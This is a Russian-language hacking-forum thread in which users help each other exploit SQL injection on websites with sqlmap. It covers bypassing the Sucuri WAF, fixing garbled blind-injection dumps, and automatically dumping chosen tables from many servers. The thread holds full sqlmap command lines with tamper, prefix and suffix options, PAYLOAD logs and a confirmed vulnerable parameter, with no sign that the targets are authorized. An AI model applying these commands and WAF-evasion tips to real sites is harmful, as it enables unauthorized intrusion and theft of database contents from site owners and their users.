ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

08.10.2018, 22:50
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме: 11937
Репутация:
0
|
|
Сообщение от zifus
zifus said:
↑
Подскажите есть ли возможность обойти waf от sucuri.
все способы с гугла опробовал..
Смотря какой вид SQL инъекции, где и что еще дополнительно меняет/фильтрует запрос и тд. А так, да, руками Sucuri обходится, но с не большими нюансами, на счёт tamper скриптов от sqlmap не уверен, что там из стандартного набора получиться обойти без проблем и блокировки, разве что только переписать/написать свой.
P.S. Вы плохо гуглите, информации из гугла по методам обходам WAF, хватит для обхода!
|
|
|

11.10.2018, 10:10
|
|
Guest
Сообщений: n/a
Провел на форуме: 3176
Репутация:
0
|
|
Сообщение от o314um
o314um said:
↑
vasyaz said:
↑
Parameter: GET
Type: boolean-based blind
Таблицы и колонки выходят нормально.
Когда делаю дамп выходит такое
[09:08:55] [INFO] retrieved:
[09:08:57] [INFO] resumed: ?????????????????????
[09:08:59] [INFO] retrieving the length of query output
[09:09:01] [INFO] retrieved:
[09:09:02] [INFO] resumed: ?????????????????????
Нашел, что надо задать кодировку вывода.
Как правильно написать запрос?
совсем все данные так выводятся?
попробуй --hex
Делаю любой дамп колонок выходит
[09:08:59] [INFO] retrieving the length of query output
[09:09:01] [INFO] retrieved:
[09:09:02] [INFO] resumed: ?????????????????????
--no-cast --hex - не помогло
|
|
|
|

14.10.2018, 10:42
|
|
Guest
Сообщений: n/a
Провел на форуме: 2056
Репутация:
0
|
|
|
|
|
|

15.10.2018, 05:17
|
|
Guest
Сообщений: n/a
Провел на форуме: 56255
Репутация:
2
|
|
Сообщение от o314um
o314um said:
↑
а руками если в брайзер выводить - нормально?
в слепой нет же вывода.
--random-agent с одной "t"
|
|
|
|

15.10.2018, 22:51
|
|
Guest
Сообщений: n/a
Провел на форуме: 3176
Репутация:
0
|
|
Сообщение от o314um
o314um said:
↑
а руками если в брайзер выводить - нормально?
В браузере вообще не выводится. Пробовал тамперы не помогло. Может есть какой то определенный тампер для этого? В этой теме видел, что у человека такая же проблема была, писал про кодировку.
Еще выводится такая строчка...
[22:49:09] [INFO] heuristics detected web page charset 'windows-1252'
Выставлял --charset=utf8, --charset=windows-1251, --charset=windows-1252
|
|
|
|

15.10.2018, 23:51
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме: 11937
Репутация:
0
|
|
Сообщение от vasyaz
vasyaz said:
↑
В браузере вообще не выводится. Пробовал тамперы не помогло. Может есть какой то определенный тампер для этого? В этой теме видел, что у человека такая же проблема была, писал про кодировку.
Еще выводится такая строчка...
[22:49:09] [INFO] heuristics detected web page charset 'windows-1252'
Выставлял --charset=utf8, --charset=windows-1251, --charset=windows-1252
Посмотрите в сторону логов запрос/ответ, могу допустить, что на сервере стоит фаерволл и он блокирует попытки слить данные из БД, на что скрипт отвечает Вам ? символами такое часто случается. Или как вариант который уже советовали, что-то не так с запросом и скрипт должным образом не выполняется на сервере, возьмите 2 запроса из скрипта где он пытается получить какой-либо символ 1-true, 2-false и проверьте руками, все ли верно там с выводом данных на странице, ответом сервера и так далее!
P.S. Попробуйте еще явно указать скрипту варианты по которым ему определять True или False запрос, например --code=200, --string="Antichat" (--not-string="Antichat"), --regex, --titles (если заголовок меняется) и так далее, это как очередное допущение, не более
|
|
|

01.11.2018, 10:37
|
|
Guest
Сообщений: n/a
Провел на форуме: 10377
Репутация:
0
|
|
Добрый день! Раскрутил SQL но WAF не дает список получить, пробовал no-cast и hex с тамперами - ничего не помогает , подскажите как быть ?
Код:
Code:
--fresh-queries --tamper=unionalltounion --prefix="111'/*!40222" --suffix="*/!'" --no-cast -v 3 --level=5 --risk=3 -p id --batch --dbs
Код:
Code:
back-end DBMS: MySQL unknown
[09:35:14] [INFO] fetching database names
[09:35:14] [INFO] fetching number of databases
[09:35:14] [PAYLOAD] 1'"
[09:35:14] [WARNING] reflective value(s) found and filtering out
[09:35:14] [WARNING] running in a single-thread mode. Please consider usage of option '--threads' for faster data retrieval
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>51)*9950*/!'
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>48)*9950*/!'
[09:35:14] [PAYLOAD] (ORD(MID((SELECT COUNT(DISTINCT(schema_name)) FROM INFORMATION_SCHEMA.SCHEMATA),1,1))>9)*9950*/!'
[09:35:14] [INFO] retrieved:
[09:35:14] [DEBUG] performed 3 queries in 0.23 seconds
[09:35:14] [ERROR] unable to retrieve the number of databases
[09:35:14] [INFO] falling back to current database
[09:35:14] [INFO] fetching current database
[09:35:14] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>64)*1021*/!'
[09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>32)*1021*/!'
[09:35:15] [PAYLOAD] (ORD(MID((DATABASE()),1,1))>1)*1021*/!'
[09:35:15] [INFO] retrieved:
[09:35:15] [DEBUG] performed 3 queries in 0.22 seconds
[09:35:15] [CRITICAL] unable to retrieve the database names
|
|
|
|

01.11.2018, 18:59
|
|
Guest
Сообщений: n/a
Провел на форуме: 10377
Репутация:
0
|
|
|
|
|
|

02.11.2018, 11:21
|
|
Guest
Сообщений: n/a
Провел на форуме: 10377
Репутация:
0
|
|
Единственное, что еще нашел - на сервере установлен Suhosin patch , но они сразу пишут какой тампер использовать, я через него и раскрутил уязвимость , но вот с выводом беда (((
Код:
Code:
[10:16:22] [INFO] checking if the injection point on GET parameter 'id' is a false positive
[10:16:25] [WARNING] parameter length constraining mechanism detected (e.g. Suhosin patch). Potential problems in enumeration phase can be expected
[10:16:25] [WARNING] it appears that the character '>' is filtered by the back-end server. You are strongly advised to rerun with the '--tamper=between'
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N
sqlmap identified the following injection point(s) with a total of 277 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: MySQL boolean-based blind - Parameter replace (bool*int)
Payload: class=27&id=(1291=1291)*2659*/!'
---
|
|
|
|

03.11.2018, 16:05
|
|
Guest
Сообщений: n/a
Провел на форуме: 4255
Репутация:
0
|
|
Хочу сделать чтобы sqlmap автоматом вытягивал нужные мне записи из списка баз на каждом сервере.
Подскажите, можно ли указать дамп нужных мне таблиц и колонок используя регулярные выражения? Пробовал --search, но он не работает в связке с --dump.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|